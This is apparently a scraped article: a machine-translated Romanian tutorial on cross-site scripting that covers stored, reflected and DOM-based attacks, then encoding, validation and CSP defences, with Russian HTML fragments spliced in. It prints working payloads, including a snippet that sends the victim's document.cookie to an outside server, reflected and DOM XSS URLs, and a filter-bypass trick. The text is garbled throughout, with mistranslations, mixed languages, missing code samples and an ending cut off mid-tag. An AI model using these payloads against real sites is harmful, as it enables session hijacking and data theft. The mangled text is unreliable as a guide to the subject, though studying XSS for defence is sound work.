Scriptura XSS trans-site. Utilizarea vulnerabilităților XSS la maxim. Îndepărtarea codului propriu

Și este un manual cuprinzător despre scripting-ul transfrontalier.

Partea întâi: Prezentare generală

Ce este XSS?

Scripting încrucișat ( engleză Scripting-ul transfrontalier) - Acesta este un atac care vizează implementarea unui cod care permite unui atacator să efectueze JavaScript rău intenționat într-un alt browser utilizator.

Atacatorul nu-i atacă direct sacrificiul. În schimb, el folosește o vulnerabilitate pe site-ul web care vizitează victima și implementează un cod rău intenționat JavaScript. În browserul victimei, JavaScript rău intenționat este afișat ca o parte legitimă a site-ului, iar site-ul în sine acționează ca un complice directă de atac.

Implementarea codului JavaScript rău intenționat

Singura modalitate de a ataca lansarea unui JavaScript rău intenționat în browser-ul victimă este să o introducă într-una din paginile pe care victima le descărcați de pe site. Acest lucru este posibil dacă site-ul web permite utilizatorilor să introducă date pe paginile lor, iar atacatorul va putea să introducă un șir care va fi determinat ca parte a codului din browserul victimei.

Exemplul de mai jos prezintă un simplu script de server care este folosit pentru a afișa ultimul comentariu pe site:

imprimare " "
Imprimare "Ultimul comentariu:"
Imprimare Database.LatestComment.
Imprimare ""

Scriptul presupune că comentariul constă doar de text. Cu toate acestea, de la imediat intrare personalizatăAtacatorul poate lăsa acest comentariu: ""Orice utilizator care a vizitat pagina va primi acum următorul răspuns:

Ultimul comentariu:

Când browserul utilizatorului încarcă pagina, acesta va efectua totul, inclusiv codul JavaScript conținut în interiorul etichetelor . Acest lucru sugerează că prezența simplă a scriptului implementat de atacator este o problemă, indiferent de faptul că un anumit cod de script este efectiv executat.

Partea a doua: Xss-atac

XSS Attack Participanți

Înainte de a descrie cum să descrieți în detaliu modul în care funcționează atacul XSS, trebuie să identificăm subiecții atacului XSS. În general, în atacul XSS există trei participanți: site-ul web., victimă, I. hoț.

Site-ul web. Oferă pagini HTML pentru utilizatorii care i-au cerut. În exemplele noastre, se află la http: // site-ul web /.
- Baza de date WebSite. Este o bază de date care stochează câteva date introduse de utilizatori pe paginile site-ului.
Victimă - aceasta este utilizator normal Site-ul web care solicită pagini cu browserul său.
Atacând - Acesta este un atacator care intenționează să înceapă un atac pentru victimă prin utilizarea vulnerabilității XSS pe site.
- Server Burglar. - Acesta este un server web sub controlul unui atacator cu singurul scop - furtul informațiilor confidențiale ale victimelor. În exemplele noastre, se află la http: // atacator /.

Exemplu de atac de scenariu

Acest script va crea o solicitare HTTP către o altă adresă URL, care va redirecționa browserul utilizatorului către serverul Atacker. Adresa URL include cookie-urile victimei ca parametru de interogare Când o solicitare HTTP vine la serverul Atacker, un atacator poate extrage aceste cookie-uri din cerere. După ce atacatorul a primit cookie-uri, el le poate folosi pentru a se da pentru sacrificiu și a început un atac ulterior.

Din acest punct de pe codul HTML afișat mai sus va fi numit string malware. sau scenariu rău intenționat. Este important să înțelegeți că șirul însuși este rău numai dacă este procesat în cele din urmă ca un cod HTML în browserul victimei și acest lucru poate apărea numai dacă vulnerabilitatea XSS este disponibilă pe site.

Cum funcționează acest exemplu

Schema de mai jos prezintă un exemplu de atac al unui atacator:

Atacatorul folosește una dintre formele site-ului pentru a introduce un șir rău intenționat la baza de date a site-ului web.
Victima solicită pagina de pe site.
Site-ul include un șir rău intenționat din baza de date ca răspuns și îl trimite victimei.
Browserul victimei efectuează un scenariu rău intenționat în răspuns, trimițând victimelor serverului de atacator.

Tipuri XSS.

Scopul atacului XSS este întotdeauna din cauza malware Scriptul JavaScript. În browserul victimei. Există mai multe modalități fundamentale diferite de a atinge acest obiectiv. Atacurile XSS sunt adesea împărțite în trei tipuri:

Stocat (permanent) xssÎn cazul în care șirul rău intenționat provine din baza de date a site-ului web.
Reflectat (non-permanent) xssunde șirul rău intenționat este generat de cererea victimei.
XSS DOM ModeleÎn cazul în care vulnerabilitatea are loc în codul de pe partea clientului și nu pe partea laterală a codului de server.

În exemplul anterior, este afișat atacul XSS stocat. Acum descriem alte două tipuri de atacuri XSS: au reflectat modelele XSS și XSS-Atac DOM.

Reflectat xss.

În cazul unui atac XSS reflectat, un șir rău intenționat face parte din cererea victimei către site-ul Web. Site-ul primește și introduce acest șir rău intenționat către utilizator trimis utilizatorului. Schema de mai jos ilustrează acest script:

Victima trimite în mod fraudulos cererea URL către site-ul web.
Site-ul include un șir rău intenționat din interogarea adresei URL ca răspuns la victimă.
Browserul victimei efectuează un scenariu rău conținut în răspuns, trimițând victimelor serverului de intrus.

Cum să efectuați cu succes un atac XSS reflectat?

Atacul XSS reflectat poate părea inofensiv, deoarece cere victima din numele său să trimită o cerere care conține un șir rău intenționat. Deoarece nimeni nu se va ataca în mod voluntar, se pare că nu există nicio modalitate de execuție efectivă a atacului.

După cum se dovedește, există cel puțin două moduri comune de a face sacrificiul să înceapă un atac XSS reflectat împotriva ei în sine:

Dacă utilizatorul este o personalitate specifică, un atacator poate trimite victima unei adrese URL rău intenționate (de exemplu, folosind e-mail sau mesager) și să înșele să-l forțeze să deschidă un link pentru a vizita site-ul web.
Dacă obiectivul este un grup mare de utilizatori, un atacator poate publica un link către o adresă de url rău (de exemplu, pe site-ul său propriu sau în rețea socială) Și așteptați vizitatorii care vor merge pe link.

Ambele metode sunt similare, iar ambele pot fi mai reușite folosind serviciile de a "scurta" adresa URL, ascund șirul rău intenționat de la utilizatorii care l-au putut identifica.

XSS în modelul DOM

XSS în modelul DOM este o opțiune ca un atac XSS stocat și reflectat. În acest atac XSS, șirul rău intenționat nu este procesat de browser-ul victimei, până când JavaScript real al site-ului este executat. Schema de mai jos ilustrează acest script pentru atacurile XSS reflectate:

Atacatorul creează o adresă URL care conține un șir rău intenționat și îl trimite victimei.
Victima este frauduloasă de către atacator trimite cererea URL către site-ul web.
Site-ul primește o cerere, dar nu include un șir rău intenționat ca răspuns.
Browserul victimei efectuează un scenariu legitim conținut în răspuns, rezultând în scenariu rău intenționat vor fi inserate în pagină.
Browserul victimei efectuează un script rău intenționat introdus în pagină, trimițând cookie-urile victimei la serverul de intruder.

Care este diferența dintre XSS în modelul DOM?

În exemplele anterioare de atacuri XSS stocate și reflectate, serverul introduce un script rău intenționat la pagină, care este apoi trimis ca răspuns la victimă. Când browserul victimei a primit un răspuns, el presupune că scriptul rău intenționat face parte din conținutul legitim al paginii și îl efectuează automat în timpul încărcării paginilor, precum și orice alt scenariu.

În exemplul atacurilor XSS din modelul DOM, scriptul rău intenționat nu este introdus ca parte a paginii; Singurul script care este executat automat în timpul încărcării paginilor este o parte legitimă a paginii. Problema este că acest scenariu legitim utilizează direct intrarea utilizatorului pentru a adăuga HTML la pagină. Deoarece șirul rău intenționat este introdus în pagină folosind INNERTML, este analizat ca HTML, ca rezultat al cărui script dăunător va fi efectuat.

Această distincție este mică, dar foarte importantă:

În XSS tradițional, JavaScript rău intenționat este efectuat când pagina este încărcată, ca parte a HTML trimisă de server.
În cazul XSS în modelul DOM, JavaScript rău intenționat este efectuat după încărcarea paginii, ca rezultat, această pagină cu JavaScript legitim este denumită o modalitate nesigură la intrarea utilizatorului (care conține un șir rău intenționat).

Cum funcționează XSS în modelul DOM?

În exemplul anterior, nu este nevoie de JavaScript; Serverul poate genera toate HTML de la sine. Dacă codul de pe partea serverului nu conține vulnerabilități, site-ul web nu ar fi supus vulnerabilităților XSS.

Cu toate acestea, deoarece aplicațiile web devin din ce în ce mai avansate, o cantitate tot mai mare de pagini HTML este generată utilizând JavaScript pe partea clientului și nu pe server. În orice moment, conținutul trebuie să se schimbe fără actualizarea întregii pagini, este posibilă utilizarea JavaScript. În special, acesta este cazul când pagina este actualizată după interogarea AJAX.

Aceasta înseamnă că vulnerabilitățile XSS pot fi prezente nu numai în partea de server a codului site-ului dvs., dar și pe partea laterală a codului JavaScript al clientului site-ului dvs. În consecință, chiar și cu un cod complet securizat pe partea serverului, codul clientului poate fi încă activat în siguranță pentru a introduce datele utilizatorilor la actualizarea DOM după descărcarea paginii. Dacă se întâmplă acest lucru, codul de la client va permite atacul XSS nu este defecțiunea codului de pe partea serverului.

XSS bazat pe modelul DOM poate fi invizibil la server

Există un caz special de atacuri XSS într-un model DOM în care un șir rău intenționat nu este trimis la serverul site-ului: acest lucru se întâmplă atunci când șirul rău intenționat este conținut în fragmentul identificatorului URL (ceva după simbolul #). Browserele nu trimit această parte a URL-ului către server, astfel încât site-ul web nu are acces la acesta utilizând codul de pe partea serverului. Codul de la Client, totuși, are acces la acesta și, prin urmare, este posibil să se efectueze un atac XSS prin procesarea nesigură.

Acest caz nu se limitează la identificatorul fragmentului. Există, de asemenea, o altă intrare de utilizator care este invizibilă la server, de exemplu, funcții noi HTML5, cum ar fi localStrage și indexeddb.

Partea a treia:
XSS Prevention.

XSS metode de prevenire

Amintiți-vă că XSS este un atac al tipului de implementare a codului: utilizatorul introdus de utilizator este interpretat în mod eronat ca un cod de program rău intenționat. Pentru a preveni acest tip de injecție de cod, este necesară o prelucrare a intrărilor securizate. Pentru un dezvoltator web, există două fundamentale diverse metode Efectuați prelucrarea intrărilor securizate:

Codare - Aceasta este o modalitate care vă permite să introduceți datele de către utilizator numai ca date și nu permite procesarea browserului ca cod.
Validare - Această metodă filtrează intrarea utilizatorului astfel încât browser-ul să o interpreteze ca un cod fără comenzi rău intenționate.

Deși acestea sunt metode fundamentale diferite de prevenire a XSS, au mai multe trăsături generale care sunt importante pentru înțelegere atunci când se utilizează oricare dintre ele:

Context Prelucrarea intrării în condiții de siguranță trebuie să se facă în mod diferit în funcție de locul în care este utilizată intrarea utilizatorului. Prelucrarea intrării securizate de intrare / ieșire poate fi efectuată fie atunci când site-ul dvs. primește date de intrare (trafic primind), fie direct înainte ca site-ul să introducă o intrare personalizată în conținutul paginii (ieșire). Prelucrarea securizată a clientului / serverului poate fi efectuată fie pe partea clientului, fie pe partea serverului, fiecare opțiune este necesară în circumstanțe diferite.

Înainte de a explica în detaliile cum funcționează codificarea și validarea, descriem fiecare dintre aceste elemente.

Procesarea introducerii utilizatorului în contexte

Există multe contexte pe o pagină web unde poate fi aplicată intrare personalizată. Normele speciale trebuie îndeplinite pentru fiecare dintre ele, astfel încât intrarea utilizatorului să nu poată "izbucni" din contextul său și nu a putut fi interpretată ca un cod rău intenționat. Mai jos sunt cele mai frecvente contexte:

Care este sensul contextelor?

În toate contextele descrise, vulnerabilitatea care duce la XSS poate să apară dacă utilizatorul introdus de utilizator a fost introdus la prima codificare sau validare. Un atacator poate introduce un cod rău intenționat pur și simplu introducerea unui separator de închidere pentru acest context și după acesta este un cod rău intenționat.

De exemplu, dacă, la un moment dat, site-ul include introducerea datelor de către utilizator direct în atributul HTML, atacatorul va putea să implementeze un script rău intenționat prin începerea cotei sale, după cum se arată mai jos:

Acest lucru ar putea fi prevenit, pur și simplu eliminând toate citatele din intrarea utilizatorului și totul ar fi bine, dar numai în acest context. Dacă intrarea a fost introdusă într-un alt context, separatorul de închidere va fi diferit și injecția va deveni posibilă. Din acest motiv, procesarea sigură a intrărilor trebuie adaptată întotdeauna în contextul în care va fi introdus intrarea utilizatorului.

Procesarea intrărilor de utilizator de intrare / ieșire

Instinctive, poate părea că XSS poate fi prevenită prin codificarea sau validarea întregului utilizator de intrare, de îndată ce site-ul nostru îl primește. Astfel, orice linii rău intenționate vor fi deja neutralizate ori de câte ori sunt incluse în pagină, iar scripturile de generare HTML nu trebuie să aibă grijă de procesarea sigură a intrării de utilizator.

Problema este că, așa cum s-a descris anterior de utilizator introdus de utilizator, poate fi introdus în mai multe contexte de pe pagină. Si nu calea usoara Determinați când intrarea utilizatorului vine în context - așa cum va fi introdusă în cele din urmă, iar aceeași intrare a utilizatorului trebuie adesea introdusă în diferite contexte. Bazându-se pe prelucrarea intrărilor de intrare pentru a preveni XSS, creăm o soluție foarte fragilă care va fi supusă erorilor. (PHP "Magic Magic" depășită sunt un exemplu de astfel de soluție.)

În schimb, prelucrarea intrării de ieșire trebuie să fie linia principală de protecție din XSS, deoarece poate lua în considerare contextul specific, care va fi introdus utilizatorul introdus de utilizator. Într-o oarecare măsură, validarea primită poate fi utilizată pentru a adăuga un strat secundar de protecție, dar mai târziu.

În cazul în care este posibilă efectuarea procesului de procesare a intrărilor de utilizare

În majoritatea aplicațiilor web moderne, intrarea utilizatorului este procesată atât pe partea laterală a codului de server, cât și pe partea de cod client. Pentru a proteja împotriva tuturor tipurilor de XSS, prelucrarea intrărilor securizate trebuie să fie executată atât în \u200b\u200bcodul de pe partea serverului, cât și în partea de cod client.

Pentru a proteja împotriva XSS tradițional, procesarea sigură a intrărilor trebuie efectuată în codul de pe partea serverului. Acest lucru se face cu o limbă acceptată de server.
Pentru a proteja împotriva atacului XSS în modelul DOM, unde serverul nu primește niciodată un șir rău intenționat (de exemplu, atacul descris anterior prin intermediul fragmentului de identificare), procesarea de intrare securizată trebuie efectuată în codul de pe partea clientului. Acest lucru se face cu JavaScript.

Acum, când am explicat de ce contextul contează, de ce diferența dintre prelucrarea intrărilor de intrare și de ieșire este importantă și de ce procesarea securizată a intrărilor trebuie făcută pe ambele părți și pe partea clientului și pe partea serverului, putem continua să explicăm Cum se efectuează două tipuri de prelucrare a intrărilor securizate (codificare și validare).

Codare

Codificarea este o cale de ieșire din situație atunci când este necesar ca browserul de intrare utilizator să interpreteze numai ca date și nu cod. Cel mai popular tip de codificare în dezvoltarea web este mascarea HTML care convertește caracterele cum ar fi < și > în < și > respectiv.

Următorul pseudocod este un exemplu de modul în care utilizatorul introdus de utilizator (enter personalizat) poate fi codificat utilizând masca HTML și apoi introdus la pagină utilizând scenariul serverului:

imprimare " "
Imprimare "Ultimul comentariu:"
Print Encodehtml (userInput)
Imprimare ""

Dacă utilizatorul intră în următoarea linie HTML rezultat va arăta astfel:

Ultimul comentariu:

Deoarece toate simbolurile cu valori speciale au fost deghizate, browserul nu va dezasambla nici o parte a intrării utilizatorului ca HTML.

Cod de codare pe partea clientului și serverul

La codificarea codului de cod de la client, este utilizată întotdeauna o limbă JavaScript, care are funcții încorporate care codifică date pentru diferite contexte.

Când efectuați codarea în codul dvs. pe partea serverului, vă bazați pe caracteristicile disponibile în limba sau cadrul dvs. din cauza un numar mare Limbi și cadre disponibile date tutorial Acesta nu va acoperi detaliile de codare în nici un anumit server sau cadru. Cu toate acestea, funcțiile de codificare JavaScript utilizate pe partea clientului sunt de asemenea utilizate la scrierea codului de pe partea serverului.

Codând pe partea clientului

Când codificați o intrare personalizată a clientului utilizând JavaScript, există mai multe metode și proprietăți încorporate care codifică automat toate datele în stil dependent de contextual:

Ultimul context deja menționat mai sus (valori în JavaScript) nu este inclus în această listă, deoarece JavaScript nu oferă o metodă de codificare a datelor încorporate, care va fi activată în codul sursă JavaScript.

Restricții de codificare

Chiar și atunci când codificați, este posibil să utilizați linii rău intenționate în anumite contexte. Un exemplu luminos al acestui lucru este atunci când intrarea utilizatorului este utilizată pentru a furniza adresa URL, de exemplu, în exemplul de mai jos:

document.QuerySelector ("A"). Href \u003d userInput

Deși valoarea specificată din proprietatea elementului HREF îl codifică automat, astfel încât să devină nu mai mult decât valoarea atributului, acest lucru în sine nu interferează cu atacatorul introduce o adresă URL care începe cu "JavaScript:". Când faceți clic pe link, indiferent de construcție, JavaScript încorporat din URL va fi executat.

Codificarea nu este, de asemenea, o soluție eficientă atunci când doriți ca utilizatorii să utilizeze o parte din codurile HTML pe pagină. Un exemplu este pagina de profil a utilizatorului, unde utilizatorul poate folosi utilizatorul HTML. Dacă acest HTML obișnuit este codificat, pagina de profil va putea consta doar din textul simplu.

În astfel de situații, codificarea ar trebui completată de validarea cu care vom cunoaște mai departe.

Validare

Validarea este un act de filtrare a intrării utilizatorului, astfel încât toate părțile rău intenționate să fie îndepărtate fără a fi nevoie să eliminați întregul cod în el. Unul dintre cele mai utilizate tipuri de verificări în dezvoltarea web vă permite să utilizați unele elemente HTML (de exemplu, și ), Dar forboving alții (de exemplu,

Cu o politică specifică CSP specifică, browserul nu poate descărca și executa script-uri rău intenționate deoarece http: // atacator / nu este specificat ca o sursă fiabilă. Chiar dacă site-ul nu a reușit să proceseze în mod sigur introducerea utilizatorului în acest caz, politica CSP a împiedicat vulnerabilitatea și provocând orice rău.

Chiar dacă atacatorul injectat prin codul din interiorul codului scenariului și nu prin referire la fișierul extern, politica CSP configurată corect va dezactiva, de asemenea, injecția în codul JavaScript care împiedică vulnerabilitatea și provocând orice rău.

Cum să activați CSP?

Implicit, browserele nu utilizează CSP. Pentru a permite SCP pe site-ul dvs., paginile trebuie să conțină un antet http suplimentar: Politica de securitate a conținutului. Orice pagină care conține acest titlu va aplica politicile de securitate în timpul pornirii unui browser, cu condiția ca browserul să accepte CSP.

Deoarece politica de securitate este trimisă cu fiecare răspuns HTTP, este posibilă instalarea individuală a unei politici pe server pentru fiecare pagină. Aceeași politică poate fi aplicată întregului site web, inserarea aceluiași antet CSP în fiecare răspuns.

Conținutul din antetul de politică de securitate-securitate conține un șir care definește una sau mai multe politici de securitate care vor funcționa pe site-ul dvs. Sintaxa acestui șir va fi descrisă mai jos.

Exemple de anteturi Această secțiune utilizează transferul de rânduri și liniuțe pentru simplitatea percepției; Acestea nu ar trebui să fie prezente în antetul prezent.

CSP sintaxă

Sintaxa antetului CSP arată astfel:

Politica de securitate-securitate:
directivă sursă-expresie, sursă-expresie, ...;
directivă ...;
...

Această sintaxă constă din două elemente:

Directive (directive) Prezentarea liniilor care indică tipul de resurse luate din lista specificată.

Expresii sursă Este un model care descrie unul sau mai multe servere de unde pot fi descărcate resursele.

Pentru fiecare directivă, datele din expresia sursă determină ce surse pot fi utilizate pentru a încărca resursele tipului corespunzător.

Directivă

Următoarele directive pot fi utilizate în antetul CSP:

connect-src.

font-src.

frame-src.

img-src.

mEDIA-SRC.

obiect-src.

script-src.

stil-src.

În plus, directiva specială Default-SRC poate fi utilizat pentru a asigura valoarea implicită pentru toate directivele care nu au fost incluse în titlu.

Exprimarea sursei

Sintaxa pentru a crea o expresie a sursei este după cum urmează:

protocol: // Numele gazdei: Numărul portului

Numele gazdei poate începe cu *, ceea ce înseamnă că orice subdomeniu al denumirii gazdei furnizate va fi rezolvat. În mod similar, numărul portului poate fi reprezentat ca *, ceea ce înseamnă că toate porturile vor fi rezolvate. În plus, protocolul și numărul portului pot fi ratate. Dacă protocolul nu este specificat, politica va necesita încărcarea tuturor resurselor utilizând HTTPS.

În plus față de sintaxa de mai sus, expresia sursei poate fi una dintre cele patru ca o alternativă cuvinte cheie Cu o valoare specială (citate sunt incluse):
"Niciuna" interzice resursele. "Sine" permite resursele de la gazda pe care se află pagina web. "NEVAFE-ININE" permite resursele conținute pe pagină ca fiind încorporate
Cumva nu foarte înfricoșător :) Ce poate fi cu adevărat periculos această vulnerabilitate?
Pasiv și activ
Există două tipuri de vulnerabilități XSS - pasive și active.
Vulnerabilitate activă Mai periculos, ca atacator nu are nevoie să atragă sacrificiul pe o legătură specială, este suficient pentru el să pună în aplicare codul în bază sau în unele fișiere de pe server. Astfel, toți vizitatorii site-ului devin automat victime. Acesta poate fi integrat, de exemplu, prin încorporarea codului SQL (injecție SQL). Prin urmare, nu trebuie să aveți încredere în datele stocate în baza de date, chiar dacă în inserție au fost procesate.
Exemplu vulnerabilitate pasivă Puteți vedea la începutul articolului. Există deja inginerie socială, de exemplu, o scrisoare importantă din partea administrației site-ului care vă cere să verificați setările contului dvs., după recuperarea de la backup. În consecință, trebuie să cunoașteți adresa victimei sau pur și simplu să organizați un buletin informativ spam sau să plasați un post pe un forum și nu încă faptul că victimele vor fi naive și vor merge la link-ul dvs.
În plus, vulnerabilitățile pasive pot fi supuse atât după postare, cât și primite parametrii. Cu post-parametri, va fi înțeleasă, va trebui să mergeți pe trucuri. De exemplu, redirecționarea de pe site-ul de intrus.

">

În consecință, vulnerabilitatea obțineți puțin mai periculoasă, deoarece Victima este mai ușor de observat domeniul greșit decât parametrul suplimentar (deși adresa URL poate fi codificată deloc).
Cookie-uri
Acesta este cel mai frecvent citat exemplu al atacurilor XSS. În siturile cookie-urilor stochează uneori orice informații valoroase (uneori chiar login și parolă (sau hash) ale utilizatorului), dar cel mai periculos este furtul unei sesiuni active, deci nu uitați să apăsați linkul "Ieșire" de pe site-uri, Chiar dacă este computer de acasă. Din fericire, în majoritatea resurselor, durata de viață a sesiunii este limitată.
var іmg \u003d imagine nouă (); Іmg.sps \u003d "http: //site/xss.php?" + document.cookie;
Prin urmare, restricțiile de domeniu pe XmlhttpRequest, dar atacatorul nu este înfricoșător, deoarece există , <img>, <script>, background:url(); и т.п.</p><h3>Кража данных из форм</h3><p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p><p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p><h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3><p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><h3>Подделка межсайтовых запросов (CSRF/XSRF)</h3><p>Также имеет косвенное отношение к XSS. Вообще это отдельный тип уязвимости, но часто используется совместно с XSS. Суть заключается в том, что пользователь, авторизированный на неуязвимом сайте, заходит на уязвимый (или специальную страницу злоумышленника), с которого отправляется запрос на совершение определенных действий.</p><p>Грубо говоря, в идеале это должно быть так. Пользователь авторизировался в системе платежей. Потом зашел на сайт злоумышленника или сайт с XSS-уязвимостью, с которого отправился запрос на перевод денег на счет злоумышленника.</p><p>Поэтому большинство сайтов при совершении определенных действий пользователя (например, смена e-mail) переспрашивают пароль или просят ввести код подтверждения.</p><h3>XSS-черви</h3><p>Этот тип атаки появился, наверное, благодаря соцсетям, таким как Вконтакте и Twitter. Суть в том, что нескольким пользователям соцсети посылается ссылка с XSS-уязвимостью, когда они перейдут по ссылке, то интегрированный скрипт рассылает сообщения другим пользователям от их имени и т.д. При этом могут совершаться и другие действия, например отсылка личных данных жертв злоумышленнику.</p><h3>Безобидный XSS</h3><p>Интересно, что счетчики по своей сути тоже являются в некотором роде активной XSS-атакой. Ведь на сторонний сервер передаются данные о посетителе, как, например, его IP-адрес, разрешение монитора и т.п. Только код в свою страничку вы интегрируете по собственной воле:) Взгляните, например, на код Google Analytic.</p> <p>Межсайтовый скриптинг (XSS) - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p> <p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу - это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP - этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>То веб-страница отобразит:</p><p>Привет! Нравится твой сайт. </p><p>А если пользователь введёт так:</p><p>Привет! Нравится твой сайт.<script>alert("Pwned")</script> </p><p>Care vor fi afișate astfel:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Browserele păstrează numeroasele cookie-uri ale unui număr mare de site-uri. Fiecare site poate obține cookie-uri numai salvate pentru ele. De exemplu, site-ul Exemplu.com a păstrat câteva module cookie în browserul dvs. Sunteți prăbușirea pe site-ul unui alt.com, acest site (scripturi client și server) nu poate accesa cookie-urile pe care site-ul Exemplu le-a salvat.</p> <p>Dacă site-ul example.com este vulnerabil la XSS, atunci acest lucru înseamnă că putem introduce într-un fel sau altul pentru a implementa codul JavaScript în acesta, iar acest cod va fi executat în numele site-ului Exemplu.com! Acestea. Acest cod va primi, de exemplu, accesul la site-ul Cookis Exemplu.com.</p> <p>Cred că toată lumea își amintește că JavaScript este executat în browserele de utilizatori, adică Dacă există XSS, malware-ul încorporat primește accesul la datele de utilizator care au deschis pagina site-ului.</p> <p>Codul încorporat este capabil de tot ce poate JavaScript poate, și anume:</p> <ul><li>accesul la cookie-urile site-ului vizualizat</li> <li>pot face modificări în <a href="https://ilyarm.ru/ro/obzor-highscreen-yummy-duo-smartfon-s-dvumya-sim-kartami-i-bolshim.html">aspect</a> Pagini</li> <li>accesul la tamponul de schimb</li> <li>pot implementa programe pe JavaScript, de exemplu, Ki-Loggeri (interceptoare cheie împinse)</li> <li>atingeți carnea de vită.</li> <li>si etc.</li> </ul><p>Cel mai simplu exemplu cu Cookiz:</p><p> <script>alert(document.cookie)</script> </p><p>De fapt, <b>alerta.</b> Folosit numai pentru a detecta xss. Real Malware-ul plătește acțiuni ascunse. Este ascuns se leagă de un server de intruder la distanță și transmite date furate pe ea.</p> <h2>Tipuri de XSS. <br></h2> <p>Cel mai important lucru este că trebuie să înțelegeți despre tipurile de XSS Ce se întâmplă:</p> <ul><li>Stocat (constant)</li> <li>Reflectat (non-permanent)</li> </ul><p>Exemplu de permanent:</p> <ul><li>Un atacator a introdus un mesaj special format la cartea de oaspeți (comentariu, mesaj de forum, profil) care este stocat pe server, încărcat de pe server de fiecare dată când utilizatorii solicită afișarea acestei pagini.</li> <li>Atacatorul a avut acces la datele serverului, de exemplu, prin <a href="https://ilyarm.ru/ro/instrukciya-po-ispolzovaniyu-jsql-injection-mnogofunkcionalnogo-instrumenta.html">SQL Injection</a>, și a implementat un cod JavaScript rău intenționat la datele emise de utilizator (cu Ki-logers sau carne de vită).</li> </ul><p>Eșantion de non-permanent:</p> <ul><li>Site-ul are o căutare, care, împreună cu rezultatele căutării, arată ceva de genul "căutați: [String de căutare]", în timp ce datele nu sunt filtrate corect. Deoarece o astfel de pagină este afișată numai pentru a avea o legătură cu aceasta, în timp ce atacatorul nu va trimite link-ul către alți utilizatori ai site-ului, atacul nu va funcționa. În loc să trimiteți o referire la victimă, puteți utiliza plasarea unui script rău intenționat pe un loc neutru care vizitează victima.</li> </ul><p>Încă mai stați (unele ca un fel de vulnerabilități XSS permanente, unii spun că această specie poate fi o varietate de XSS constant):</p> <ul><li>Modelul DOM.</li> </ul><h2>Caracteristici XSS bazate pe DOM <br></h2> <p>Dacă sunteți complet simplu, codul rău intenționat "obișnuit" nepermanent XSS poate fi văzut dacă deschideți codul HTML. De exemplu, legătura este formată în acest fel:</p><p>Http://example.com/search.php?q\u003d "/\u003e<script>alert(1)</script> </p><p>Și când deschideți codul HTML original, vedem așa ceva:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">A găsi</button> </form> </p><p>Și Dom XSS schimbă structura DOM care se formează în browser în zbor și vedeți codul rău intenționat, numai când vizualizăm structura DOM formată. HTML nu se schimbă. Să luăm acest cod, de exemplu:</p><p> <!DOCTYPE html> <html> <head> <title>site ::: Dom XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default"> A aparut o eroare ...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>Că în browser vom vedea:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Codul sursă de pagină:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>Să formăm adresa după cum urmează:</p><p>Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.<script>alert(1)</script>; </p><p>Acum, pagina arată astfel:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>Dar să ne uităm la codul sursă HTML:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>Nu a fost niciodată schimbată nimic. Despre asta am spus, trebuie să vedem documentul de structură DOM pentru a identifica codul rău intenționat:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>Iată un prototip de lucru XSS, pentru un atac real, avem nevoie de o sarcină utilă mai complexă, care este imposibilă datorită faptului că aplicația nu mai citi imediat după un punct cu o virgulă și ceva de genul <b>alertă (1); Alertă (2)</b> Nu mai este posibil. Cu toate acestea, datorită <b>unescape ()</b> În datele returnate, putem folosi încărcătura utilă ca aceasta:</p><p>Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.<script>alert(1)%3balert(2)</script>; </p><p>Unde am înlocuit simbolul <b>; </b> Pe echivalentul codificat în URI!</p> <p>Acum putem scrie un program malware de JavaScript și putem face un link pentru a trimite victima, așa cum se face pentru scripting-ul standard nepermanent.</p> <h2>Auditorul XSS. <br></h2> <p>ÎN <a 